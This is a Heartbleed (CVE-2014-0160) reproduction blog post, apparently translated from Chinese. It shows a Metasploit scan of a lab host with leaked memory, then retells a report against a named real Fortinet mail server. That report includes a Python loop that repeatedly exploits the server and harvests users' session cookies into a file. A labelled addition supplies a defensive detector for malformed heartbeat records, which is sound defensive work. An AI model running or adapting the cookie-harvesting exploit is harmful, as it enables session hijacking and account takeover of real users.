  • HEARTBLEED vulnerability reproduction

    Two articles analysing the vulnerability:

    https://blog.csdn.net/javajiawei/article/details/82429886

    https://xz.aliyun.com/t/1771

    set verbose true is required, otherwise the leaked content is not shown.

    msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134
    rhosts => 172.16.20.134
    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
    
    [*] 172.16.20.134:443     - Sending Client Hello...
    [*] 172.16.20.134:443     - SSL record #1:
    [*] 172.16.20.134:443     -     Type:    22
    [*] 172.16.20.134:443     -     Version: 0x0301
    [*] 172.16.20.134:443     -     Length:  86
    [*] 172.16.20.134:443     -     Handshake #1:
    [*] 172.16.20.134:443     -             Length: 82
    [*] 172.16.20.134:443     -             Type:   Server Hello (2)
    [*] 172.16.20.134:443     -             Server Hello Version:           0x0301
    [*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b
    [*] 172.16.20.134:443     -             Server Hello Session ID length: 32
    [*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af
    [*] 172.16.20.134:443     - SSL record #2:
    [*] 172.16.20.134:443     -     Type:    22
    [*] 172.16.20.134:443     -     Version: 0x0301
    [*] 172.16.20.134:443     -     Length:  909
    [*] 172.16.20.134:443     -     Handshake #1:
    [*] 172.16.20.134:443     -             Length: 905
    [*] 172.16.20.134:443     -             Type:   Certificate Data (11)
    [*] 172.16.20.134:443     -             Certificates length: 902
    [*] 172.16.20.134:443     -             Data length: 905
    [*] 172.16.20.134:443     -             Certificate #1:
    [*] 172.16.20.134:443     -                     Certificate #1: Length: 899
    [*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>
    [*] 172.16.20.134:443     - SSL record #3:
    [*] 172.16.20.134:443     -     Type:    22
    [*] 172.16.20.134:443     -     Version: 0x0301
    [*] 172.16.20.134:443     -     Length:  331
    [*] 172.16.20.134:443     -     Handshake #1:
    [*] 172.16.20.134:443     -             Length: 327
    [*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)
    [*] 172.16.20.134:443     - SSL record #4:
    [*] 172.16.20.134:443     -     Type:    22
    [*] 172.16.20.134:443     -     Version: 0x0301
    [*] 172.16.20.134:443     -     Length:  4
    [*] 172.16.20.134:443     -     Handshake #1:
    [*] 172.16.20.134:443     -             Length: 0
    [*] 172.16.20.134:443     -             Type:   Server Hello Done (14)
    [*] 172.16.20.134:443     - Sending Heartbeat...
    [*] 172.16.20.134:443     - Heartbeat response, 65535 bytes
    [+] 172.16.20.134:443     - Heartbeat response with leak
    [*] 172.16.20.134:443     - Printable info leaked:
    ......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS.......J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. 
..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... 
.|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS.......J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... 
repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    

    WooYun case

    Details:

    Fortinet mail server URL: https://mail.fortinet.com.cn
    Vulnerable port: 443
    This port is affected by CVE-2014-0160, the Heartbleed vulnerability; each request can read 64 KB of server memory.
    First, the test output from the handy openssl.py:



    [screenshot: QQ图片20160410113206.jpg]



    Account cookies are visible; the following script keeps grabbing cookies continuously:



    import os
    import re
    import time

    accounts = []
    while True:
        # run the openssl.py tester against the host and capture its output
        result = os.popen('openssl.py mail.fortinet.com.cn').read()
        # extract (session1, cookie) pairs from the leaked memory dump
        matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)
        for match in matches:
            if match not in accounts:
                accounts.append(match)
                with open('accounts.txt', 'a') as inFile:
                    inFile.write(str(match) + ' ')
                print('New Account:', match)
        time.sleep(1.0)



    After a short while it had already grabbed three:

    [screenshot: QQ图片20160410114214.png]



    Proof of vulnerability:

    [screenshot: QQ图片20160410113206.jpg]



    [screenshot: QQ图片20160410114214.png]

    Fix:

    Patch
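    The case above states that each request reads 64 KB of server memory, and the fix is simply the vendor patch. What that patch does is a bounds check: a heartbeat message (RFC 6520) carries a 16-bit payload_length, and unpatched OpenSSL trusted that field and copied that many bytes into the response regardless of how many bytes the record really contained; the patched code rejects any request where 1 + 2 + payload_length + 16 exceeds the record length. The following is an added example, not code from the original post or from the WooYun report, that parses TLS heartbeat records and applies exactly that check so malformed requests can be flagged in captured traffic. All sample records are constructed inline; function names (build_heartbeat, check_heartbeat, scan_records) are this example's own.

```python
# Added example: parse TLS heartbeat records (RFC 6520) and flag the
# Heartbleed condition, i.e. a declared payload_length larger than the
# bytes the record actually carries. Mirrors the bounds check the OpenSSL
# patch introduced. Sample records below are constructed for the demo.
import struct

TLS_HEARTBEAT = 24          # TLS ContentType for heartbeat records
TLS_APPDATA = 23            # TLS ContentType for application data
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16            # RFC 6520: at least 16 bytes of padding
TLS_1_0 = 0x0301            # version seen in the scan output above


def build_heartbeat(hb_type, declared_len, payload, padding, version=TLS_1_0):
    """Assemble one TLS record carrying a heartbeat message.

    declared_len is written as given, so a caller can produce a record
    whose length field does not match the payload it really carries.
    """
    body = struct.pack("!BH", hb_type, declared_len) + payload + padding
    return struct.pack("!BHH", TLS_HEARTBEAT, version, len(body)) + body


def parse_tls_record(data):
    """Split one TLS record into (content_type, version, body)."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than declared length")
    return ctype, version, body


def check_heartbeat(record):
    """Classify one record; returns None for non-heartbeat records.

    The message is malformed when the declared payload plus the mandatory
    padding does not fit inside the bytes actually received, which is the
    check the patched OpenSSL performs before building a response.
    """
    ctype, _version, body = parse_tls_record(record)
    if ctype != TLS_HEARTBEAT:
        return None
    if len(body) < 3:
        return {"type": None, "declared": None, "carried": len(body), "malformed": True}
    hb_type, declared = struct.unpack("!BH", body[:3])
    needed = 1 + 2 + declared + MIN_PADDING
    return {"type": hb_type, "declared": declared, "carried": len(body),
            "malformed": needed > len(body)}


def scan_records(records):
    """Return (index, finding) for every heartbeat record that fails the check."""
    alerts = []
    for i, rec in enumerate(records):
        finding = check_heartbeat(rec)
        if finding is not None and finding["malformed"]:
            alerts.append((i, finding))
    return alerts


# Constructed sample traffic: a benign request, an application-data record,
# a request of the kind a Heartbleed scanner sends (large declared length,
# no payload), and a response sitting exactly on the minimum-padding boundary.
BENIGN = build_heartbeat(HEARTBEAT_REQUEST, 3, b"abc", b"\x00" * MIN_PADDING)
APPDATA = struct.pack("!BHH", TLS_APPDATA, TLS_1_0, 4) + b"ping"
OVERSIZED = build_heartbeat(HEARTBEAT_REQUEST, 0x4000, b"", b"")
MIN_PAD_RESPONSE = build_heartbeat(HEARTBEAT_RESPONSE, 0, b"", b"\x00" * MIN_PADDING)

SAMPLE = [BENIGN, APPDATA, OVERSIZED, MIN_PAD_RESPONSE]

if __name__ == "__main__":
    for idx, finding in scan_records(SAMPLE):
        print("record %d: declares %s payload bytes but carries only %d body bytes; "
              "malformed heartbeat" % (idx, finding["declared"], finding["carried"]))
```

    Run as a script it reports only record 2, the oversized request. The same check_heartbeat function can be applied to heartbeat records extracted from a packet capture; a record that fails it is either a scanner probe or a broken implementation, and on an unpatched server the response to it would be up to 64 KB of process memory, as the scan output above shows.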

  • Original source: https://www.cnblogs.com/junsec/p/11474465.html